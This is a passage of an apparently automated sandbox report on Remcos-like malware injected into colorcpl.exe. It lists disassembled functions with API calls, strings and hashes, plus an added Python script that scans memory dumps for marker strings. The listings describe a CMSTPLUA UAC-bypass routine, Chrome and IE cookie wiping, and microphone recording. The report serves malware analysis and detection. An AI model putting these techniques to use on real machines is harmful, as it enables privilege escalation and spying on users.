                                                                                                                              • Instruction ID: 4c1d965f8361a43bab82b299725798810c352a2d541d54d4cd0802873ab8c2f8
                                                                                                                              • Opcode Fuzzy Hash: b947fc6d8ac663bf2065c7bb8ccfdf939ce5e4c804513a338766b42ec6dce31f
                                                                                                                              • Instruction Fuzzy Hash: D151B3B0A00649AFDB10CFA8D894AEEBBF4EF09700F14455AEA55E7281F630BD55CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • _strftime.LIBCMT ref: 04661D50
                                                                                                                                • Part of subcall function 04661A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 04661AD9
                                                                                                                              • waveInUnprepareHeader.WINMM(046D2A88,00000020,00000000,?), ref: 04661E02
                                                                                                                              • waveInPrepareHeader.WINMM(046D2A88,00000020), ref: 04661E40
                                                                                                                              • waveInAddBuffer.WINMM(046D2A88,00000020), ref: 04661E4F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                              • String ID: %Y-%m-%d %H.%M$.wav
                                                                                                                              • API String ID: 3809562944-3597965672
                                                                                                                              • Opcode ID: b1e1afd9991fa664f3acd2854139c9b2b74651b6feec97ed7e0b3f23d33f7a0c
                                                                                                                              • Instruction ID: cd7763167ed623491cf037e2f5ce07f68b6fbb3548cd5a6d1b0bb171f62a2bf3
                                                                                                                              • Opcode Fuzzy Hash: b1e1afd9991fa664f3acd2854139c9b2b74651b6feec97ed7e0b3f23d33f7a0c
                                                                                                                              • Instruction Fuzzy Hash: E0316D719043059FE324EB20D865ADA77E8EB55319F44486DE14B92190FF34BD09CB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046735A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 046735CA
                                                                                                                                • Part of subcall function 046735A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 046735E7
                                                                                                                                • Part of subcall function 046735A6: RegCloseKey.KERNEL32(?), ref: 046735F2
                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0466BF6B
                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0466BF78
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                              • API String ID: 1133728706-4073444585
                                                                                                                              • Opcode ID: 08d3fa05559c9e80ef5a7c5debcb62a7b76e638a23fb95c517a7e8f95f1245a9
                                                                                                                              • Instruction ID: 88ba428a0239e2faaa6afe736381ffb47b91d9f328d3cbc35bf5ab3f6f324217
                                                                                                                              • Opcode Fuzzy Hash: 08d3fa05559c9e80ef5a7c5debcb62a7b76e638a23fb95c517a7e8f95f1245a9
                                                                                                                              • Instruction Fuzzy Hash: C9215E71A40119ABEB04F7B4CC698FE7768AF55708F80005DD907A7290FE31BA59CAD9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d4fbc1c50c5e360e689a8e8ce861141be949e10646fd566757ea09b550b74052
                                                                                                                              • Instruction ID: c1f0b20cafe4b468464eae19e4be732c5e5fdfc4154895c0bbc9bf6abaf2a79f
                                                                                                                              • Opcode Fuzzy Hash: d4fbc1c50c5e360e689a8e8ce861141be949e10646fd566757ea09b550b74052
                                                                                                                              • Instruction Fuzzy Hash: A711B7B1604214BBDB216F76DC489AF7AACEB927247104219F855D6250FA34AC91CBF1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

APIs
  • Part of subcall function 046B0C41: _free.LIBCMT ref: 046B0C6A
• _free.LIBCMT ref: 046B0F48
  • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
  • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
• _free.LIBCMT ref: 046B0F53
• _free.LIBCMT ref: 046B0F5E
• _free.LIBCMT ref: 046B0FB2
• _free.LIBCMT ref: 046B0FBD
• _free.LIBCMT ref: 046B0FC8
• _free.LIBCMT ref: 046B0FD3
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction ID: c1bce35745800a48ca4149e959b81023189f196d92d05021d1669c0bbdd64635
• Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction Fuzzy Hash: 1F114FB1581B04BAE521BBB0CC46FCB7B9CAF00705F44481DAAEE66070EBB5FD945B94
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction ID: d942f0093e9fcd46a09b241b6be394b54d4f07e8aecb33a1eca0299060fb90f2
• Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
• Instruction Fuzzy Hash: 12114C71940BBCEAD6E0FBB0CD09FCB7BDDAF00710F814825A3A9A6152DA65B504C651
Uniqueness

Uniqueness Score: -1.00%

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 066F1E7C
• int.LIBCPMT ref: 066F1E8F
  • Part of subcall function 066EEDCD: std::_Lockit::_Lockit.LIBCPMT ref: 066EEDDE
  • Part of subcall function 066EEDCD: std::_Lockit::~_Lockit.LIBCPMT ref: 066EEDF8
• std::_Facet_Register.LIBCPMT ref: 066F1ECF
• std::_Lockit::~_Lockit.LIBCPMT ref: 066F1ED8
• __CxxThrowException@8.LIBVCRUNTIME ref: 066F1EF6
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: (mG
• API String ID: 2536120697-4059303827
• Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
• Instruction ID: f2d8a92ff244f0d4b4fe034d2863d8a86221c2093e9c138b5109e94d887b383d
• Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
• Instruction Fuzzy Hash: 86112C72A10114D7CBA0EBA8DC048DDBFB9DF81260F11055AEA14AB290DF329E01CBD4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,0469A351,046992BE), ref: 0469A368
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0469A376
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0469A38F
• SetLastError.KERNEL32(00000000,?,0469A351,046992BE), ref: 0469A3E1
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 5cb1bed74ae639f723737448811b6dbc4e6a21ac3195c1c6372e3ca0200104ee
• Instruction ID: 9f46d5ec9c0cacfed694e544abc72a06361aa23d8524f53c308b8c2b82b9bd07
• Opcode Fuzzy Hash: 5cb1bed74ae639f723737448811b6dbc4e6a21ac3195c1c6372e3ca0200104ee
• Instruction Fuzzy Hash: ED01F53261E262AFAF153AF86CA46BA27CCEB532B9320432EE514821D0FFD56C009244
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\colorcpl.exe), ref: 046675D0
  • Part of subcall function 046674FD: _wcslen.LIBCMT ref: 04667521
  • Part of subcall function 046674FD: CoGetObject.OLE32(?,00000024,046C6518,00000000), ref: 04667582
• CoUninitialize.OLE32 ref: 04667629
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\SysWOW64\colorcpl.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-3410284080
• Opcode ID: d8c6e52d5e5d0ab193ec1a2f38da36c617ad3671ad7a5152e333b92280f1061e
• Instruction ID: 59917dfb3abf42ae4fa306717c45e565791b706887e9deaec715a2858a4cf691
• Opcode Fuzzy Hash: d8c6e52d5e5d0ab193ec1a2f38da36c617ad3671ad7a5152e333b92280f1061e
• Instruction Fuzzy Hash: 55019E723113106FF328AB68EC0EE7B775CDF8172EF11052EF91686281FA91BC044AA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0466BADD
• GetLastError.KERNEL32 ref: 0466BAE7
Strings
• [Chrome Cookies found, cleared!], xrefs: 0466BB0D
• [Chrome Cookies not found], xrefs: 0466BB01
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0466BAA8
• UserProfile, xrefs: 0466BAAD
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
• Opcode ID: 5ed721cca0b2a9cb0b466b89edd34bf3c09ac8d009dbf7628f1c3cb89c31e468
• Instruction ID: 3aa38c8c7fecd4137d809e0841c5548908bbf4c6e6bfa712241d2da5a4a72d3a
• Opcode Fuzzy Hash: 5ed721cca0b2a9cb0b466b89edd34bf3c09ac8d009dbf7628f1c3cb89c31e468
• Instruction Fuzzy Hash: 9E012D31F40119ABDB04BBB9DC5B8FE776CED12504B40115DD40392194FD627B55DBC6
Uniqueness

Uniqueness Score: -1.00%
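
The two function listings above are the ones whose strings back the overview's CMSTPLUA UAC-bypass and Chrome-cookie signatures: the first calls CoInitializeEx and then CoGetObject inside a subcall, with the debug strings "[+] ucmCMLuaUtilShellExecMethod", "[+] before ShellExec" and "[+] ShellExec success" (the CMLuaUtil ShellExec method of the CMSTPLUA elevated COM object); the second calls DeleteFileA on %UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Cookies and logs "[Chrome Cookies found, cleared!]" or "[Chrome Cookies not found]". The Python script below is an added triage example, not part of the Joe Sandbox report and not code recovered from the sample: it scans a raw memory dump for exactly those marker strings, in both narrow and UTF-16LE form, and reports a capability only when more than one of its markers is present, so a lone string does not trigger. The capability names and the two-marker threshold are my own choices, and the embedded dump is a constructed byte buffer, not the 04660000 region from the report.

```python
import re
from typing import Dict, List, Tuple

# Marker strings copied from the two function listings above, as they appear in the dump.
# Grouping them under capability names is my own labelling, not something the report states.
CAPABILITY_MARKERS: Dict[str, Tuple[str, ...]] = {
    "uac_bypass_cmlua": (
        "[+] ucmCMLuaUtilShellExecMethod",
        "[+] before ShellExec",
        "[+] ShellExec success",
    ),
    "chrome_cookie_wipe": (
        r"\AppData\Local\Google\Chrome\User Data\Default\Cookies",
        "[Chrome Cookies found, cleared!]",
        "[Chrome Cookies not found]",
    ),
}


def _needles(marker: str) -> List[bytes]:
    # A dump can hold the same literal as narrow (A-suffix API) or wide (W-suffix API)
    # text, so search for both encodings of every marker.
    return [marker.encode("ascii"), marker.encode("utf-16-le")]


def scan_dump(data: bytes) -> Dict[str, Dict[str, List[int]]]:
    """Return {capability: {marker: [offsets]}} for every marker found in data."""
    hits: Dict[str, Dict[str, List[int]]] = {}
    for capability, markers in CAPABILITY_MARKERS.items():
        for marker in markers:
            offsets: List[int] = []
            for needle in _needles(marker):
                offsets.extend(m.start() for m in re.finditer(re.escape(needle), data))
            if offsets:
                hits.setdefault(capability, {})[marker] = sorted(offsets)
    return hits


def confirmed_capabilities(hits: Dict[str, Dict[str, List[int]]], min_markers: int = 2) -> List[str]:
    """Report a capability only when at least min_markers distinct markers were found.

    One string on its own (e.g. "[Chrome Cookies not found]") is weak evidence; the
    before/after debug-log pair around a call is a better sign that the code path exists.
    """
    return sorted(cap for cap, found in hits.items() if len(found) >= min_markers)


# Constructed sample "dump": the markers embedded in filler bytes, one of them stored as
# UTF-16LE. This is a synthetic buffer so the script runs offline; it is not the
# 04660000 region from the report.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"[+] ucmCMLuaUtilShellExecMethod\x00"
    + b"\x90" * 32
    + "[+] before ShellExec".encode("utf-16-le")
    + b"\x00" * 16
    + b"[+] ShellExec success\x00"
    + b"A" * 128
    + rb"\AppData\Local\Google\Chrome\User Data\Default\Cookies" + b"\x00"
    + b"[Chrome Cookies not found]\x00"
    + b"B" * 40
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP)
    for capability, markers in found.items():
        for marker, offsets in markers.items():
            print(f"{capability:20s} {marker!r} at {[hex(o) for o in offsets]}")
    print("confirmed:", confirmed_capabilities(found))
```

To use it on a real artefact, pass the bytes of a dumped region (for example the .sdmp file named in the Memory Dump Source line) to scan_dump and feed the result to confirmed_capabilities; the offsets it returns are relative to the start of the buffer, so add the region base (04660000 here) to compare them with the xrefs in the listing. Unpacked Remcos strings are plain and unobfuscated, which is why a string scan works; a packed or encrypted stage would need to be dumped first, as the sandbox did.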

APIs
• _free.LIBCMT ref: 046A4066
  • Part of subcall function 046A6782: RtlFreeHeap.NTDLL(00000000,00000000,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A), ref: 046A6798
  • Part of subcall function 046A6782: GetLastError.KERNEL32(0000000A,?,046B0C6F,0000000A,00000000,0000000A,00000000,?,046B0F13,0000000A,00000007,0000000A,?,046B145E,0000000A,0000000A), ref: 046A67AA
• _free.LIBCMT ref: 046A4078
• _free.LIBCMT ref: 046A408B
• _free.LIBCMT ref: 046A409C
• _free.LIBCMT ref: 046A40AD
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: `.A
• API String ID: 776569668-3175770648
• Opcode ID: 9870d64f8ae5b81ae8f5f1ea6acc1c475beb997e5a75a5e72c1859bce9fad1ba
• Instruction ID: bdcb87485580c62a7a99c58cfd23ef973c998d81689ba32eddcd1cd8c7f27b0f
• Opcode Fuzzy Hash: 9870d64f8ae5b81ae8f5f1ea6acc1c475beb997e5a75a5e72c1859bce9fad1ba
• Instruction Fuzzy Hash: 50F09071C129108F9722AF18F8504453721E71972534D618AF0245A674FB789EA28FD6
Uniqueness

Uniqueness Score: -1.00%

APIs
• __allrem.LIBCMT ref: 0469AC69
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469AC85
• __allrem.LIBCMT ref: 0469AC9C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469ACBA
• __allrem.LIBCMT ref: 0469ACD1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469ACEF
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 23660a67582818b9dc4951035eb361c0185f11ba5ead73d9d51cae96f632fb9a
• Instruction ID: 2c9c10d8790da9119f3024b85b3bc526ec2f9d85c19f882bdce714c3432d19e1
• Opcode Fuzzy Hash: 23660a67582818b9dc4951035eb361c0185f11ba5ead73d9d51cae96f632fb9a
• Instruction Fuzzy Hash: 0281FB72600B469BEB249EA8CC41B6A73EDAF41324F24452EE510DB780FBF4FD458B54
Uniqueness

Uniqueness Score: -1.00%

APIs
• __allrem.LIBCMT ref: 0671B975
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0671B991
• __allrem.LIBCMT ref: 0671B9A8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0671B9C6
• __allrem.LIBCMT ref: 0671B9DD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0671B9FB
Memory Dump Source
• Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
• Instruction ID: 25d046c8ea3f2210a75e6680db8829e96bd0210177ce578c7077c576f47673be
                                                                                                                              • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                                                              • Instruction Fuzzy Hash: C8810772A007169BE7A0AE6DCC84B7A73E8EF44F24F14452FE621DF690E774D9018B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467179C: SetLastError.KERNEL32(0000000D,04671D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04671CFA), ref: 046717A2
                                                                                                                              • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04671CFA), ref: 04671D37
                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,0466D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04671CFA), ref: 04671DA5
                                                                                                                              • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 04671DC9
                                                                                                                                • Part of subcall function 04671CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,04671DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 04671CB3
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 04671E10
                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 04671E17
                                                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04671F2A
                                                                                                                                • Part of subcall function 04672077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,04671F37,?,?,?,?,?), ref: 046720E7
                                                                                                                                • Part of subcall function 04672077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 046720EE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3950776272-0
                                                                                                                              • Opcode ID: 97ef5c5e93bc75c9c08a74a4bd84e47fa1885d5b1c7e1eb05dc69e38c0c52009
                                                                                                                              • Instruction ID: cfb748f819f8fbab41ed0b187ac75130c82f7fa87ef5d64b8648a63abf28c60e
                                                                                                                              • Opcode Fuzzy Hash: 97ef5c5e93bc75c9c08a74a4bd84e47fa1885d5b1c7e1eb05dc69e38c0c52009
                                                                                                                              • Instruction Fuzzy Hash: 2661C0B0601601ABD7119F65C980BAA7BE5FF86744F04411BE9058B381FB78F856CBD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4189289331-0
                                                                                                                              • Opcode ID: 875ef276a1fffead33f7bcaa3f1f40bfa8f1ac3df85af44ab7073793060c28a1
                                                                                                                              • Instruction ID: f14a6ff2b0d7677d46905068c262c401ec3bd64d43ff817b7710553548be2c80
                                                                                                                              • Opcode Fuzzy Hash: 875ef276a1fffead33f7bcaa3f1f40bfa8f1ac3df85af44ab7073793060c28a1
                                                                                                                              • Instruction Fuzzy Hash: 2C511D32A01A05BBEB14DF58CC80FAE77A9EF49334F14421DE51696281FB31FD208E64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4189289331-0
                                                                                                                              • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                                                                                                              • Instruction ID: 6812487fc3ba2ac5938982bab7e57fdc7ef54e65eb0a690aa5a1e5e774d24498
                                                                                                                              • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                                                                                                              • Instruction Fuzzy Hash: 97513C72D00227ABDBE49F68DD84EBE77A8EF48330F24421BF92496291FB35D500C664
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __freea$__alloca_probe_16_free
                                                                                                                              • String ID: a/p$am/pm
                                                                                                                              • API String ID: 2936374016-3206640213
                                                                                                                              • Opcode ID: ee88a3f97ef37d40def1cd7b5b1af40f2f02ea08df493b774a74a12d0fae6b58
                                                                                                                              • Instruction ID: acc8e79ec5e2447750928c6d899decb0828af45df0d01071789a5c9cee2875de
                                                                                                                              • Opcode Fuzzy Hash: ee88a3f97ef37d40def1cd7b5b1af40f2f02ea08df493b774a74a12d0fae6b58
                                                                                                                              • Instruction Fuzzy Hash: F5D1E231A00A06DADB28DF68C854BBAB7B1EF25302F18415AD545AB351F335FDA1CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 04670E6E
                                                                                                                              • int.LIBCPMT ref: 04670E81
                                                                                                                                • Part of subcall function 0466E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0466E0D2
                                                                                                                                • Part of subcall function 0466E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0466E0EC
                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 04670EC1
                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 04670ECA
                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 04670EE8
                                                                                                                              • __Init_thread_footer.LIBCMT ref: 04670F29
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3815856325-0
                                                                                                                              • Opcode ID: 3e19673f5def3e8268982e45d235a711439c539dca8402431c2113b8fd26cb68
                                                                                                                              • Instruction ID: 40d18fd1a91108ff06bd951a5f73bf15a81d8ebb22f51a51320df09b45d3bc2a
                                                                                                                              • Opcode Fuzzy Hash: 3e19673f5def3e8268982e45d235a711439c539dca8402431c2113b8fd26cb68
                                                                                                                              • Instruction Fuzzy Hash: B021D536905514ABEB14FBB8D8448AE77BCDF48328B20015EE915A7280FF75BD418BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,0469F720,0469A7F5,0469F720,046D4EF8,?,0469CE15,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8219
                                                                                                                              • _free.LIBCMT ref: 046A824C
                                                                                                                              • _free.LIBCMT ref: 046A8274
                                                                                                                              • SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8281
                                                                                                                              • SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A828D
                                                                                                                              • _abort.LIBCMT ref: 046A8293
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3160817290-0
                                                                                                                              • Opcode ID: c64c914efea9692d2614cc2584daee37083dc716317b26dbfc5cc48192673cf6
                                                                                                                              • Instruction ID: 324a0eaea5a0fef55c5cfcabc9abcb3c3650a3b9919399c3741820d1b227eaaf
                                                                                                                              • Opcode Fuzzy Hash: c64c914efea9692d2614cc2584daee37083dc716317b26dbfc5cc48192673cf6
                                                                                                                              • Instruction Fuzzy Hash: 92F0F936644F002BD71133287C48B7A2515DFD276DF28011CF92493280FF64EC654DE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0467A523,00000000), ref: 0467AC20
